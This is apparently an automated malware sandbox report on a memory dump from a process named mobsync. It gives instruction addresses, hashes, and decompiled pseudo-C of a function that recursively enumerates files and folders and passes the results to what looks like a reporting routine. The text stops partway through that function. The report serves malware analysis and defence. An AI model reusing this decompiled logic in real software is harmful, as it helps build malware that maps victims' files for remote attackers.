0x0044cb0d
0x0044cb0f
0x0044cb15
0x0044cb15
0x0044cb17
0x0044cb17
0x0044cb1e
0x0044cb25
0x00000000
0x00000000
0x0044cb2b
0x0044cb2e
0x0044cb31
0x00000000
0x0044cb33
0x0044cb33
0x0044cb33
0x0044cb33
0x0044cb3a
0x0044cb3d
0x0044cb44
0x0044cb44
0x0044cb3f
0x0044cb3f
0x0044cb3f
0x0044cb48
0x0044cb4b
0x0044cb4d
0x0044cb4f
0x0044cb55
0x0044cb5b
0x0044cb5d
0x0044cb5d
0x0044cb5d
0x0044cb64
0x0044cb64
0x0044cb66
0x0044cb72
0x0044cb72
0x0044cb72
0x0044cb68
0x0044cb6a
0x0044cb6a
0x0044cb79
0x0044cb7c
0x0044cb7e
0x0044cb85
0x0044cb85
0x0044cb80
0x0044cb80
0x0044cb80
0x0044cb8d
0x0044cb98
0x0044cb9e
0x0044cb9f
0x0044cba4
0x0044cbaa
0x0044cbad
0x00000000
0x00000000
0x0044cbaf
0x0044cbaf
0x0044cbb9
0x0044cbc4
0x0044cbcc
0x0044cbd2
0x0044cbdd
0x0044cbe3
0x0044cbea
0x0044cbfd
0x0044cc04
0x0044cc04
0x00000000
0x0044cb31
0x0044cb17
0x00000000
0x0044cb0f
0x0044cd4c
0x0044cd4c
0x0044cd52
0x0044cd57
0x0044cd5d
0x0044cd5d
0x0044cd60
0x0044cd67
0x0044cd6e
0x0044cd6f
0x0044cd70
0x0044cd75
0x0044c6fa
0x0044c6fa
0x0044c703
0x0044c704
0x0044c70e
0x0044c714
0x0044c716
0x0044c91c
0x0044c924
0x0044c927
0x0044c92c
0x0044c92f
0x0044c937
0x0044c93b
0x0044c941
0x0044c947
0x0044c94c
0x0044c953
0x0044c954
0x0044c954
0x0044c954
0x0044c95b
0x0044c95e
0x0044c966
0x0044c96c
0x0044c971
0x0044c971
0x0044c96e
0x0044c96e
0x0044c96e
0x0044c975
0x0044c976
0x0044c978
0x0044c97b
0x0044c981
0x0044c987
0x0044c98a
0x0044c98d
0x0044c993
0x0044c996
0x0044c999
0x0044c9a3
0x0044c9a3
0x0044c9a3
0x0044c99b
0x0044c99b
0x0044c99d
0x00000000
0x0044c99f
0x0044c99f
0x0044c99f
0x0044c99d
0x0044c9a5
0x0044c9a7
0x0044ca99
0x0044ca99
0x0044ca9b
0x0044caa0
0x0044caa1
0x0044caa7
0x0044cab3
0x0044caba
0x0044cabb
0x0044cabc
0x0044cac1
0x0044c9ad
0x0044c9ad
0x0044c9af
0x00000000
0x0044c9b5
0x0044c9b7
0x0044c9b8
0x0044c9ba
0x0044c9bc
0x0044c9be
0x0044c9be
0x0044c9c4
0x0044c9c6
0x0044c9cc
0x0044c9cf
0x0044c9dd
0x0044c9e3
0x0044c9e3
0x0044c9e5
0x0044c9e8
0x0044c9ee
0x0044c9ee
0x0044c9f0
0x00000000
0x00000000
0x0044c9f2
0x0044c9f4
0x0044c9fa
0x0044c9fa
0x0044c9f6
0x0044c9f6
0x0044c9f6
0x0044c9ff
0x0044ca01
0x0044ca08
0x0044ca08
0x0044ca03
0x0044ca03
0x0044ca03
0x0044ca2e
0x0044ca34
0x0044ca37
0x0044ca3d
0x0044ca44
0x0044ca45
0x0044ca46
0x0044ca4c
0x0044ca4f
0x0044ca51
0x00000000
0x0044ca51
0x00000000
0x0044ca4f
0x0044ca59
0x0044ca5f
0x0044ca67
0x0044ca67
0x0044ca68
0x0044ca6a
0x0044ca6e
0x0044ca76
0x0044ca76
0x0044ca76
0x0044ca78
0x0044ca7f
0x0044ca84
0x0044ca91
0x0044ca86
0x0044ca89
0x0044ca89
0x0044ca84
0x0044c9af
0x0044cac4
0x0044cace
0x0044cad4
0x0044cada
0x0044cae0
0x0044c71c
0x0044c71c
0x0044c71c
0x0044c71e
0x0044c725
0x0044c72c
0x00000000
0x00000000
0x0044c732
0x0044c735
0x0044c738
0x00000000
0x0044c73a
0x0044c742
0x0044c747
0x0044c74c
0x0044c74d
0x0044c74f
0x0044c757
0x0044c75b
0x0044c761
0x0044c767
0x0044c76c
0x0044c773
0x0044c773
0x0044c774
0x0044c777
0x0044c77f
0x0044c785
0x0044c78a
0x0044c78a
0x0044c787
0x0044c787
0x0044c787
0x0044c78e
0x0044c78f
0x0044c791
0x0044c794
0x0044c79a
0x0044c7a0
0x0044c7a3
0x0044c7a6
0x0044c7ac
0x0044c7af
0x0044c7b2
0x0044c7bc
0x0044c7bc
0x0044c7bc
0x0044c7b4
0x0044c7b4
0x0044c7b6
0x00000000
0x0044c7b8
0x0044c7b8
0x0044c7b8
0x0044c7b6
0x0044c7be
0x0044c7c0
0x0044c8b5
0x0044c8b5
0x0044c8b7
0x0044c8bc
0x0044c8bd
0x0044c8c3
0x0044c8cf
0x0044c8d6
0x0044c8d7
0x0044c8d8
0x0044c8dd
0x0044c7c6
0x0044c7c6
0x0044c7c8
0x00000000
0x0044c7ce
0x0044c7d0
0x0044c7d1
0x0044c7d3
0x0044c7d5
0x0044c7d7
0x0044c7d7
0x0044c7dd
0x0044c7df
0x0044c7e5
0x0044c7e8
0x0044c7f6
0x0044c7fc
0x0044c7fc
0x0044c7fe
0x0044c801
0x0044c807
0x0044c807
0x0044c809
0x00000000
0x00000000
0x0044c80b
0x0044c80d
0x0044c813
0x0044c813
0x0044c80f
0x0044c80f
0x0044c80f
0x0044c818
0x0044c81a
0x0044c827
0x0044c827
0x0044c81c
0x0044c822
0x0044c822
0x0044c845
0x0044c84d
0x0044c854
0x0044c85b
0x0044c85c
0x0044c85f
0x0044c865
0x0044c86b
0x0044c86e
0x0044c870
0x00000000
0x0044c870
0x00000000
0x0044c86e
0x0044c878
0x0044c87e
0x0044c87e
0x0044c884
0x0044c886
0x0044c890
0x0044c892
0x0044c892
0x0044c892
0x0044c894
0x0044c89b
0x0044c8a0
0x0044c8ad
0x0044c8a2
0x0044c8a5
0x0044c8a5
0x0044c8a0
0x0044c7c8
0x0044c8e0
0x0044c8eb
0x0044c8ec
0x0044c8ed
0x0044c8f3
0x0044c8f9
0x0044c8ff
0x0044c8ff
0x00000000
0x0044c738
0x00000000
0x0044c71e
0x0044c900
0x0044c906
0x0044c90d
0x0044c90e
0x0044c90f
0x0044c914
0x0044c914
0x0044cd78
0x0044cd82
0x0044cd83
0x0044cd89
0x0044cd8b
0x0044d1f4
0x0044d1f6
0x0044d1f8
0x0044d1fe
0x0044d200
0x0044d206
0x0044d208
0x0044d55a
0x0044d55a
0x0044d55c
0x0044d562
0x0044d569
0x0044d56f
0x0044d571
0x0044d60f
0x0044d60f
0x0044d611
0x0044d612
0x0044d618
0x00000000
0x0044d577
0x0044d577
0x0044d57a
0x0044d580
0x0044d586
0x0044d588
0x0044d58e
0x0044d590
0x0044d590
0x0044d592
0x0044d592
0x0044d59b
0x0044d5a2
0x0044d5a8
0x0044d5ab
0x0044d5ac
0x0044d5ae
0x0044d5ae
0x0044d5b2
0x0044d5b4
0x0044d5b6
0x0044d5bc
0x0044d5bf
0x00000000
0x0044d5c1
0x0044d5c1
0x0044d5c8
0x0044d5c8
0x0044d5bf
0x0044d5b4
0x0044d588
0x0044d57a
0x0044d571
0x0044d20e
0x0044d20e
0x0044d20e
0x0044d211
0x0044d215
0x0044d215
0x0044d216
0x0044d228
0x0044d235
0x0044d244
0x0044d26e
0x0044d273
0x0044d279
0x0044d27c
0x0044d282
0x0044d285
0x0044d31e
0x0044d325
0x0044d3a3
0x0044d3a9
0x0044d3af
0x0044d3b2
0x0044d3b4
0x0044d43d
0x0044d3ba
0x0044d3ba
0x0044d3c0
0x0044d3c0
0x0044d3c6
0x0044d3cc
0x0044d3ce
0x0044d3d0
0x0044d3d0
0x0044d3d6
0x0044d3dc
0x0044d3de
0x0044d3e6
0x0044d3e6
0x0044d3ec
0x0044d3ee
0x0044d3f0
0x0044d3f6
0x0044d3f8
0x0044d50f
0x0044d511
0x0044d517
0x0044d517
0x0044d51a
0x0044d51b
0x00000000
0x0044d3fe
0x0044d404
0x0044d404
0x0044d406
0x0044d40c
0x0044d40f
0x0044d416
0x0044d41c
0x0044d41e
0x0044d445
0x0044d447
0x0044d449
0x0044d44b
0x0044d451
0x0044d457
0x0044d4f1
0x0044d4f1
0x0044d4f4
0x00000000
0x0044d4fa
0x0044d4fa
0x0044d500
0x00000000
0x0044d500
0x0044d45d
0x0044d45d
0x0044d45d
0x0044d460
0x00000000
0x00000000
0x0044d462
0x0044d464
0x0044d466
0x0044d46f
0x0044d46f
0x0044d471
0x0044d477
0x0044d477
0x0044d483
0x0044d48e
0x0044d491
0x0044d49e
0x0044d4a1
0x0044d4a2
0x0044d4a3
0x0044d4a9
0x0044d4ab
0x0044d4b1
0x0044d4b7
0x00000000
0x00000000
0x00000000
0x00000000
0x0044d4b9
0x0044d4b9
0x0044d4b9
0x0044d4bb
0x00000000
0x00000000
0x0044d4bd
0x0044d4c0
0x00000000
0x0044d4c6
0x0044d4c6
0x0044d4c8
0x0044d4ca
0x0044d4ca
0x0044d4ca
0x0044d4d2
0x0044d4d5
0x0044d4d5
0x0044d4db
0x0044d4dd
0x0044d4df
0x0044d4e6
0x0044d4ec
0x0044d4ee
0x00000000
0x0044d4ee
0x00000000
0x0044d4c0
0x00000000
0x0044d4b9
0x00000000
0x0044d45d
0x0044d420
0x0044d420
0x0044d422
0x0044d428
0x0044d42f
0x0044d42f
0x0044d432
0x0044d432
0x00000000
0x0044d422
0x00000000
0x0044d506
0x0044d506
0x0044d507
0x0044d507
0x00000000
0x0044d40c
0x0044d327
0x0044d327
0x0044d332
0x0044d339
0x0044d33f
0x0044d346
0x0044d347
0x0044d348
0x0044d34d
0x0044d350
0x0044d352
0x00000000
0x0044d358
0x0044d358
0x0044d35b
0x00000000
0x0044d361
0x0044d361
0x0044d368
0x00000000
0x0044d36e
0x0044d374
0x0044d376
0x0044d37c
0x0044d37c
0x0044d37e
0x0044d37e
0x0044d380
0x0044d389
0x0044d390
0x0044d393
0x0044d394
0x0044d396
0x0044d396
0x00000000
0x0044d39e
0x0044d368
0x0044d35b
0x0044d352
0x0044d28b
0x0044d28b
0x0044d291
0x0044d293
0x0044d2af
0x0044d2b2
0x00000000
0x0044d2b8
0x0044d2b8
0x0044d2bf
0x00000000
0x0044d2c5
0x0044d2cb
0x0044d2cd
0x0044d2d3
0x0044d2d3
0x0044d2d5
0x0044d2d5
0x0044d2d7
0x0044d2e0
0x0044d2e7
0x0044d2ea
0x0044d2eb
0x0044d2ed
0x0044d2ed
0x0044d2f5
0x0044d2f5
0x0044d2f7
0x00000000
0x0044d2fd
0x0044d2fd
0x0044d303
0x0044d306
0x0044d5d0
0x0044d5d2
0x0044d5d3
0x0044d5d9
0x0044d5e5
0x0044d5ec
0x0044d5ed
0x0044d5ee
0x0044d5f3
0x0044d5f6
0x0044d30c
0x0044d30c
0x0044d313
0x00000000
0x0044d313
0x0044d306
0x0044d2f7
0x0044d2bf
0x0044d295
0x0044d295
0x0044d297
0x0044d29d
0x0044d2a3
0x0044d2a4
0x0044d521
0x0044d521
0x0044d528
0x0044d529
0x0044d52a
0x0044d52f
0x0044d532
0x0044d532
0x0044d532
0x0044d293
0x0044d534
0x0044d534
0x0044d536
0x0044d5fd
0x0044d604
0x0044d60b
0x0044d61e
0x0044d624
0x0044d625
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044d53c
0x0044d542
0x0044d542
0x0044d548
0x0044d548
0x0044d554
0x00000000
0x0044d554
0x0044cd91
0x0044cd91
0x0044cd93
0x0044cd99
0x0044cd9b
0x0044cda1
0x0044cda3
0x0044d11a
0x0044d11a
0x0044d11c
0x0044d122
0x0044d129
0x0044d12b
0x0044d18a
0x0044d18d
0x0044d193
0x0044d199
0x0044d19f
0x0044d1a1
0x0044d1a7
0x0044d1a9
0x0044d1a9
0x0044d1ab
0x0044d1ab
0x0044d1ad
0x0044d1b6
0x0044d1bd
0x0044d1c0
0x0044d1c1
0x0044d1c3
0x0044d1c3
0x0044d1cb
0x0044d1cd
0x0044d1d3
0x0044d1d9
0x0044d1dc
0x00000000
0x0044d1e2
0x0044d1e2
0x0044d1e9
0x0044d1e9
0x0044d1dc
0x0044d1cd
0x0044d1a1
0x0044d12d
0x0044d12d
0x0044d12f
0x0044d135
0x0044d13b
0x00000000
0x0044d13b
0x0044d12b
0x0044cda9
0x0044cda9
0x0044cda9
0x0044cdac
0x0044cdb0
0x0044cdb0
0x0044cdb1
0x0044cdc3
0x0044cdd0
0x0044cddf
0x0044ce09
0x0044ce0e
0x0044ce14
0x0044ce17
0x0044ce1d
0x0044ce20
0x0044ce9c
0x0044cea3
0x0044cf67
0x0044cf6d
0x0044cf73
0x0044cf76
0x0044cf78
0x0044d001
0x0044cf7e
0x0044cf7e
0x0044cf84
0x0044cf84
0x0044cf8a
0x0044cf90
0x0044cf92
0x0044cf94
0x0044cf94
0x0044cf9a
0x0044cfa0
0x0044cfa2
0x0044cfaa
0x0044cfaa
0x0044cfb0
0x0044cfb2
0x0044cfb4
0x0044cfba
0x0044cfbc
0x0044d0d3
0x0044d0d5
0x0044d0db
0x0044d0db
0x00000000
0x0044cfc2
0x0044cfc8
0x0044cfc8
0x0044cfca
0x0044cfd0
0x0044cfd3
0x0044cfda
0x0044cfe0
0x0044cfe2
0x0044d009
0x0044d00b
0x0044d00d
0x0044d00f
0x0044d015
0x0044d01b
0x0044d0b5
0x0044d0b5
0x0044d0b8
0x00000000
0x0044d0be
0x0044d0be
0x0044d0c4
0x00000000
0x0044d0c4
0x0044d021
0x0044d021
0x0044d021
0x0044d024
0x00000000
0x00000000
0x0044d026
0x0044d028
0x0044d02a
0x0044d033
0x0044d033
0x0044d035
0x0044d03b
0x0044d03b
0x0044d047
0x0044d052
0x0044d055
0x0044d062
0x0044d065
0x0044d066
0x0044d067
0x0044d06d
0x0044d06f
0x0044d075
0x0044d07b
0x00000000
0x00000000
0x00000000
0x00000000
0x0044d07d
0x0044d07d
0x0044d07d
0x0044d07f
0x00000000
0x00000000
0x0044d081
0x0044d084
0x0044d13e
0x0044d13e
0x0044d140
0x0044d146
0x0044d14c
0x0044d14d
0x00000000
0x0044d08a
0x0044d08a
0x0044d08c
0x0044d08e
0x0044d08e
0x0044d08e
0x0044d096
0x0044d099
0x0044d099
0x0044d09f
0x0044d0a1
0x0044d0a3
0x0044d0aa
0x0044d0b0
0x0044d0b2
0x00000000
0x0044d0b2
0x00000000
0x0044d084
0x00000000
0x0044d07d
0x00000000
0x0044d021
0x0044cfe4
0x0044cfe4
0x0044cfe6
0x0044cfec
0x0044cff3
0x0044cff3
0x0044cff6
0x0044cff6
0x00000000
0x0044cfe6
0x00000000
0x0044d0ca
0x0044d0ca
0x0044d0cb
0x0044d0cb
0x00000000
0x0044cfd0
0x0044cea9
0x0044cea9
0x0044ceb4
0x0044cebb
0x0044cec1
0x0044cec8
0x0044cec9
0x0044ceca
0x0044cecf
0x0044ced2
0x0044ced4
0x0044cef0
0x0044cef3
0x00000000
0x0044cef9
0x0044cef9
0x0044cf00
0x00000000
0x0044cf06
0x0044cf0c
0x0044cf0e
0x0044cf14
0x0044cf14
0x0044cf16
0x0044cf16
0x0044cf18
0x0044cf21
0x0044cf28
0x0044cf2b
0x0044cf2c
0x0044cf2e
0x0044cf2e
0x00000000
0x0044cf16
0x0044cf00
0x0044ced6
0x0044ced8
0x0044cede
0x0044cee4
0x0044cee5
0x00000000
0x0044cee5
0x0044ced4
0x0044ce22
0x0044ce22
0x0044ce28
0x0044ce2a
0x0044ce3f
0x0044ce42
0x00000000
0x0044ce48
0x0044ce48
0x0044ce4f
0x00000000
0x0044ce55
0x0044ce5b
0x0044ce5d
0x0044ce63
0x0044ce63
0x0044ce65
0x0044ce65
0x0044ce67
0x0044ce70
0x0044ce77
0x0044ce7a
0x0044ce7b
0x0044ce7d
0x0044ce7d
0x0044cf36
0x0044cf36
0x0044cf38
0x00000000
0x0044cf3e
0x0044cf3e
0x0044cf44
0x0044cf47
0x0044ce8a
0x0044ce91
0x00000000
0x0044cf4d
0x0044cf4f
0x0044cf55
0x0044cf5b
0x0044cf5c
0x0044d153
0x0044d153
0x0044d15a
0x0044d15b
0x0044d15c
0x0044d161
0x0044d164
0x0044d164
0x0044cf47
0x0044cf38
0x0044ce4f
0x0044ce2c
0x0044ce2c
0x0044ce2e
0x0044ce34
0x0044d0de
0x0044d0de
0x0044d0df
0x0044d0e5
0x0044d0e5
0x0044d0ec
0x0044d0ed
0x0044d0ee
0x0044d0f3
0x0044d0f6
0x0044d0f6
0x0044d0f6
0x0044ce2a
0x0044d0f8
0x0044d0f8
0x0044d0fa
0x0044d168
0x0044d16f
0x0044d16f
0x0044d16f
0x0044d176
0x0044d178
0x0044d17e
0x0044d17f
0x0044d62b
0x0044d62b
0x0044d62c
0x0044d62d
0x0044d632
0x00000000
0x00000000
0x00000000
0x00000000
0x0044d0fc
0x0044d102
0x0044d102
0x0044d108
0x0044d108
0x0044d114
0x00000000
0x0044d114
0x0044cda3
0x0044d635
0x0044d635
0x0044d63b
0x0044d63d
0x0044d643
0x0044d649
0x0044d64b
0x0044d64d
0x0044d64f
0x0044d64f
0x0044d651
0x0044d651
0x0044d65a
0x0044d65b
0x0044d65f
0x0044d666
0x0044d669
0x0044d66a
0x0044d66c
0x0044d66c
0x0044d670
0x0044d676
0x0044d678
0x0044d67e
0x0044d680
0x0044d686
0x0044d689
0x0044d69c
0x0044d69e
0x0044d69f
0x0044d6a5
0x0044d6b1
0x0044d6b8
0x0044d6b9
0x0044d6ba
0x0044d6bf
0x0044d68b
0x0044d68d
0x0044d694
0x0044d694
0x0044d689
0x0044d6c2
0x0044d6c2
0x0044d6d2
0x0044d6db
0x0044d6dc
0x0044d6de
0x0044d775
0x0044d777
0x0044d782
0x0044d782
0x0044d784
0x0044d787
0x0044d789
0x00000000
0x0044d779
0x0044d77f
0x0044d77f
0x0044d6e4
0x0044d6e4
0x0044d6ea
0x0044d6ed
0x0044d6f3
0x0044d6f6
0x0044d6fc
0x0044d6fe
0x0044d704
0x0044d706
0x0044d708
0x0044d708
0x0044d70a
0x0044d70a
0x0044d717
0x0044d71e
0x0044d721
0x0044d722
0x0044d724
0x0044d725
0x0044d725
0x0044d729
0x0044d72f
0x0044d731
0x0044d733
0x0044d739
0x0044d73c
0x0044d74f
0x0044d750
0x0044d756
0x0044d762
0x0044d769
0x0044d76a
0x0044d76b
0x0044d770
0x0044d73e
0x0044d73e
0x0044d745
0x0044d745
0x0044d73c
0x0044d731
0x0044d78f
0x0044d78f
0x0044d78f
0x0044d79b
0x0044d79e
0x0044d7a4
0x0044d7a6
0x0044d7a8
0x0044d7ae
0x0044d7b0
0x0044d7b0
0x0044d7b0
0x0044d7ae
0x0044d7b5
0x0044d7b6
0x0044d7b8
0x0044d7ba
0x0044d7ba
0x0044d7bc
0x0044d7c2
0x0044d7c8
0x0044d7ca
0x0044d7d0
0x0044d7d0
0x0044d7d6
0x0044d7d8
0x00000000
0x00000000
0x0044d7de
0x0044d7e0
0x0044d7e2
0x0044d7e2
0x0044d7e4
0x0044d7e4
0x0044d7f4
0x0044d7fb
0x0044d7fe
0x0044d7ff
0x0044d801
0x0044d801
0x0044d805
0x0044d80b
0x0044d80d
0x0044d80f
0x0044d815
0x0044d818
0x0044d829
0x0044d82b
0x0044d82c
0x0044d832
0x0044d83e
0x0044d845
0x0044d846
0x0044d847
0x0044d84c
0x0044d81a
0x0044d81a
0x0044d821
0x0044d821
0x0044d818
0x0044d85d
0x0044d86c
0x0044d86d
0x0044d86d
0x0044d86f
0x0044d871
0x0044d871
0x0044d877
0x0044d87a
0x0044d87c
0x0044d87e
0x0044d87e
0x0044d881
0x0044d882
0x0044d882
0x0044d887
0x0044d88a
0x0044d88e
0x0044d88e
0x0044d88f
0x0044d891
0x0044d897
0x0044d89d
0x00000000
0x00000000
0x00000000
0x0044d89d
0x0044d7d0
0x0044d8a3
0x0044d8a3
0x00000000
0x0044d8a3
0x0044c628
0x0044c61f
0x0044c616
0x0044c5cd
0x0044c5d1
0x0044c5d9
0x00000000
0x0044c5db
0x0044c5e1
0x0044c5e6
0x0044d8c2
0x0044d8c2
0x0044d8c5
0x0044d8d0
0x0044d8fb
0x0044d8fc
0x0044d8fd
0x0044d8fe
0x0044d8ff
0x0044d900
0x0044d905
0x0044d908
0x0044d90b
0x0044d90c
0x0044d90f
0x0044d911
0x0044d917
0x0044d91a
0x0044d91c
0x0044d931
0x0044d932
0x0044d935
0x0044d937
0x0044d94d
0x0044d953
0x0044d95b
0x0044d95d
0x0044d968
0x0044d96b
0x0044d982
0x0044d96d
0x0044d96d
0x0044d972
0x00000000
0x0044d972
0x0044d95f
0x0044d95f
0x0044d964
0x0044d974
0x0044d974
0x0044d975
0x0044d977
0x0044d97c
0x0044d97c
0x0044d939
0x0044d939
0x0044d93c
0x00000000
0x0044d93e
0x0044d941
0x0044d949
0x0044d949
0x0044d93c
0x0044d91e
0x0044d91e
0x0044d925
0x0044d926
0x0044d928
0x0044d92d
0x0044d92d
0x0044d913
0x0044d913
0x0044d913
0x0044d986
0x0044d8d2
0x0044d8d2
0x0044d8d2
0x0044d8dc
0x0044d8e5
0x0044d8ea
0x0044d8f8
0x0044d8f8
0x0044d8d0
0x0044c5d9

APIs

__floor_pentium4.LIBCMT ref: 0044C6B0

Strings

1#INF, xrefs: 0044D8BD
1#QNAN, xrefs: 0044D8B6
1#IND, xrefs: 0044D8A8
1#SNAN, xrefs: 0044D8AF

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: cf356c03e6c11912674b3f35e41d95c6cdad640e8cd84ef5b000fa992b2cbda9
Instruction ID: f597cd4d3feb19bea4020203649494fec6d8b180545536f30adfddf8b006302f
Opcode Fuzzy Hash: cf356c03e6c11912674b3f35e41d95c6cdad640e8cd84ef5b000fa992b2cbda9
Instruction Fuzzy Hash: 6FC25D72E056288FEB65CE28DD807EAB7B5EB44305F1541EBD80DE7240E778AE818F45

Uniqueness

Uniqueness Score: -1.00%

Function 004077EE, Relevance: 9.3, APIs: 6, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004077EE(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t106;
				intOrPtr* _t111;
				signed int _t121;
				void* _t133;
				void* _t154;
				void* _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				void* _t206;
				char* _t220;
				char* _t221;
				void* _t255;
				void* _t264;
				signed int _t267;
				void* _t273;
				void* _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t283;
				void* _t284;
				void* _t287;

				_t255 = __edx;
				_t188 = __ecx;
				E00450918(0x451e92, _t279);
				_t282 = _t281 - 0x300;
				 *((intOrPtr*)(_t279 - 0x10)) = _t282;
				_t185 = _t188;
				 *(_t279 - 0x18) = _t185;
				E004020B5(_t185, _t279 - 0x9c);
				 *(_t279 - 0x1c) =  *(_t279 - 0x1c) | 0xffffffff;
				 *_t185 = 0;
				 *(_t279 - 4) =  *(_t279 - 4) & 0x00000000;
				_t186 = _t185 + 4;
				E00404955(_t186);
				_t283 = _t282 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t106 = E004049D2(_t255, _t264);
				_t289 = _t106;
				if(_t106 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t283 = _t283 - 0x18;
					L00402F73(_t186, _t283, L00402F97(_t279 - 0x6c, _t279 + 0x38, 0x46c238), _t289, _t279 + 0x50);
					_push(0x64);
					_t186 = _t186 & 0xffffff00 | E00404A6E(_t186, _t186, _t179, _t289) == 0xffffffff;
					L00401FA7();
					_t291 = _t186;
					if(_t186 != 0) {
						L00404DD5( *(_t279 - 0x18) + 4);
						 *((intOrPtr*)(_t279 - 0x20)) = 1;
						_push(0x4685c0);
						_t157 = _t279 - 0x20;
						L3:
						_push(_t157);
						L4:
						E0043196A();
					}
				}
				_t266 = E004022EA(_t279 + 0x20, _t279 - 0x30);
				_t111 = E004022AD(_t279 + 0x20, _t279 - 0x34);
				E00408228(_t279 - 0x3c,  *((intOrPtr*)(E004022EA(_t279 + 0x20, _t279 - 0x38))),  *_t111,  *_t109);
				_t284 = _t283 + 0xc;
				_t256 = _t279 + 8;
				_t273 = FindFirstFileW(L00401ECB(E00407516(_t279 - 0x6c, _t279 + 8, _t291, "*")), _t279 - 0x304);
				 *(_t279 - 0x1c) = _t273;
				L00401ED0();
				_t291 = _t273 - 0xffffffff;
				if(_t273 != 0xffffffff) {
					goto L7;
				} else {
					_t283 = _t284 - 0x18;
					E00402064(_t186, _t283, 0x45f6ac);
					_push(0x65);
					E00404A6E(_t186,  *(_t279 - 0x18) + 4, _t256, _t291);
					L00404DD5( *(_t279 - 0x18) + 4);
					 *((intOrPtr*)(_t279 - 0x24)) = 2;
					_push(0x4685c0);
					_t157 = _t279 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t121 = FindNextFileW(_t273, _t279 - 0x304);
					__eflags = _t121;
					if(_t121 == 0) {
						break;
					}
					_t186 =  *(_t279 - 0x18);
					__eflags =  *_t186;
					if( *_t186 == 0) {
						__eflags =  *(_t279 - 0x304) & 0x00000010;
						if(( *(_t279 - 0x304) & 0x00000010) == 0) {
							L31:
							E0040425F(_t186, _t279 - 0x84, _t279 - 0x2d8);
							_t266 = E004022EA(_t279 - 0x84, _t279 - 0x3c);
							_t276 = E004022AD(_t279 - 0x84, _t279 - 0x38);
							E00408228(_t279 - 0x30,  *((intOrPtr*)(E004022EA(_t279 - 0x84, _t279 - 0x34))),  *_t139,  *_t137);
							_t284 = _t284 + 0xc;
							__eflags = E00408099(_t279 - 0x84, _t279 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L34:
								L00401ED0();
								_t273 =  *(_t279 - 0x1c);
								continue;
							} else {
								L00401FB1(_t279 - 0x9c, _t256, _t276, E0040208B(_t186, _t279 - 0x54, _t256, __eflags, _t279 - 0x304, 0x250));
								L00401FA7();
								_t284 = _t284 - 0x18;
								_t256 = L00402F73(_t186, _t279 - 0x54, L00416CF4(_t186, _t279 - 0xb4, _t279 + 8), __eflags, 0x46c238);
								L00402F73(_t186, _t284, _t152, __eflags, _t279 - 0x9c);
								_push(0x66);
								_t154 = E00404A6E(_t186, _t186 + 4, _t152, __eflags);
								__eflags = _t154 - 0xffffffff;
								_t186 = _t186 & 0xffffff00 | _t154 == 0xffffffff;
								L00401FA7();
								L00401FA7();
								__eflags = _t186;
								if(_t186 == 0) {
									goto L34;
								} else {
									 *((intOrPtr*)(_t279 - 0x2c)) = 4;
									_push(0x4685c0);
									_t157 = _t279 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t220 = ".";
							_t158 = _t279 - 0x2d8;
							while(1) {
								_t256 =  *_t158;
								__eflags = _t256 -  *_t220;
								if(_t256 !=  *_t220) {
									break;
								}
								__eflags = _t256;
								if(_t256 == 0) {
									L17:
									_t159 = 0;
								} else {
									_t256 =  *((intOrPtr*)(_t158 + 2));
									_t43 =  &(_t220[2]); // 0x2e0000
									__eflags = _t256 -  *_t43;
									if(_t256 !=  *_t43) {
										break;
									} else {
										_t158 = _t158 + 4;
										_t220 =  &(_t220[4]);
										__eflags = _t256;
										if(_t256 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
								}
								L19:
								__eflags = _t159;
								if(_t159 == 0) {
									goto L31;
								} else {
									_t221 = L"..";
									_t160 = _t279 - 0x2d8;
									while(1) {
										_t256 =  *_t160;
										__eflags = _t256 -  *_t221;
										if(_t256 !=  *_t221) {
											break;
										}
										__eflags = _t256;
										if(_t256 == 0) {
											L25:
											_t161 = 0;
										} else {
											_t256 =  *((intOrPtr*)(_t160 + 2));
											_t46 =  &(_t221[2]); // 0x2e
											__eflags = _t256 -  *_t46;
											if(_t256 !=  *_t46) {
												break;
											} else {
												_t160 = _t160 + 4;
												_t221 =  &(_t221[4]);
												__eflags = _t256;
												if(_t256 != 0) {
													continue;
												} else {
													goto L25;
												}
											}
										}
										L27:
										__eflags = _t161;
										if(__eflags == 0) {
											goto L31;
										} else {
											_t256 = E00408252(_t186, _t279 - 0xb4, _t279 + 8, __eflags, E0040425F(_t186, _t279 - 0x54, _t279 - 0x2d8));
											E00403086(_t186, _t279 - 0x6c, _t164, _t266, __eflags, "\\");
											L00401ED0();
											L00401ED0();
											_t287 = _t284 - 0x18;
											E00407352(_t186, _t287, _t164, __eflags, _t279 + 0x20);
											_t284 = _t287 - 0x18;
											E00407352(_t186, _t284, _t164, __eflags, _t279 - 0x6c);
											_t172 = L00407C57(_t186, _t164, __eflags);
											__eflags = _t172;
											if(_t172 != 0) {
												L00401ED0();
												goto L31;
											} else {
												 *((intOrPtr*)(_t279 - 0x28)) = 3;
												_push(0x4685c0);
												_t157 = _t279 - 0x28;
												goto L3;
											}
										}
										goto L37;
									}
									asm("sbb eax, eax");
									_t161 = _t160 | 0x00000001;
									__eflags = _t161;
									goto L27;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							_t159 = _t158 | 0x00000001;
							__eflags = _t159;
							goto L19;
						}
						L37:
						L00401FA7();
						L00401ED0();
						L00401ED0();
						L00401FA7();
						_t133 = L00401FA7();
						 *[fs:0x0] =  *((intOrPtr*)(_t279 - 0xc));
